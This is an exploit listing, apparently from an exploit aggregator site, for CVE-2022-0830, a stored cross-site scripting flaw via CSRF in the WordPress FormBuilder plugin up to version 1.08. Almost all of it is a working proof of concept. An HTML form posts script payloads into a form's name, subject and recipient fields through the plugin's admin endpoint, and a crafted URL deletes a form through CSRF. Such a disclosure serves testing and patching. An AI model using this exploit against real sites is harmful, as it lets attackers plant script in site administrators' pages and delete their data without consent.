Exploit for FormBuilder <= 1.08 - Stored Cross-Site Scripting via CSRF CVE-2022-0830

Name: Exploit for FormBuilder <= 1.08 - Stored Cross-Site Scripting via CSRF CVE-2022-0830
Rating: 5 (69 reviews)

2022-03-08 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:114C0202-39F8-4748-AC0D-013D2D6F02F7
Edit a form and put XSS payloads:

<html>
  <body>
    <form action="https://example.com/wp-admin/tools.php?page=formbuilder.php&fbaction=editForm&fbid=1" method="POST">
      <input type="hidden" name="formbuilder[name]" value='A New Form"><script>alert(/XSS1/)</script>' />
      <input type="hidden" name="formbuilder[subject]" value='Generic Website Feedback FormA New Form"><script>alert(/XSS2/)</script>' />
      <input type="hidden" name="formbuilder[recipient]" value='admin@localhost.orgA New Form"><script>alert(/XSS3/)</script>' />
      <input type="hidden" name="formbuilder[method]" value="POST" />
      <input type="hidden" name="formbuilder[action]" value="" />
      <input type="hidden" name="formbuilder[thankyoutext]" value="" />
      <input type="hidden" name="formbuilder[autoresponse]" value="" />
      <input type="hidden" name="formbuilder[tags]" value="" />
      <input type="hidden" name="Save" value="Save Form" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Delete a form: https://example.com/wp-admin/tools.php?page=formbuilder.php&fbtag=&pageNumber=&fbaction=removeForm&fbid=2